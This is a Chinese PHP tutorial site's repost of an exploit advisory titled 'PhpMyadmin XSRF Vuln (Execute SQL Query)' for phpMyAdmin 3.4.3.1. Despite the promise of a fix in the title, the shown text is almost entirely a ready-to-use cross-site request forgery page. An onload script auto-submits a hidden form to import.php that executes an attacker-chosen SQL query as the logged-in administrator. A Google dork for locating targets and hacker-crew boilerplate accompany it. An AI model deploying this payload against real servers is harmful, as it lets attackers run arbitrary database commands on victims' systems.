网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

PhpMyadmin XSRF 缺陷 (执行sql查询)及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] # Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)# Author: Caddy-Dz# Facebook Page: www.facebook.com/islam.caddy# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-......

# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/phpmyadmin/
# Category:: Webapps
# Tested on: [Windows Seven Edition Intégral- French]
####
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
####


[+] Note :

Only the request executed by the root,users (Server)


[+] Tested on : EasyPhp 5.4alpha2

-Apache 2.2.19
-MySQL 5.5.13
-PhpMyAdmin 3.4.3.1
-Xdebug 2.1.1

[+] Video:

http://www.youtube.com/watch?v=xJH_ujBNTVY

[*] ExpLo!T :

<html>
<head>
 
</head>
 
<body onload="javascript:fireForms()">
<script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
 </script>
<form method="post" action="http://www.2cto.com /home/mysql/import.php"  enctype="multipart/form-data" class="ajax" id="sqlqueryform" name="sqlform">
<input type="hidden" name="is_js_confirmed" value="0" />
<input type="hidden" name="token" value="47cd4b47756bd497165c6fc7f87d2182" />  <<== make sure you put the right value
<input type="hidden" name="pos" value="0" />
<input type="hidden" name="goto" value="server_sql.php" />
<input type="hidden" name="message_to_show" value="Votre requête SQL a été exécutée avec succès" />
<input type="hidden" name="prev_sql_query" value="" />
<textarea type="hidden" tabindex="100" name="sql_query" id="sqlquery"  cols="40"  rows="30"  dir="ltr">Your SQL Query;</textarea>
<input type="hidden" name="bkm_label" value="" />
<input type="hidden" name="bkm_all_users" value="true" />
<input type="hidden" name="bkm_replace" value="true" />
<input type="hidden" name="sql_delimiter" value=";" /> ]
<input type="hidden" name="show_query" value="1" checked="checked" />
</form>


####

[+] Peace From Algeria

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论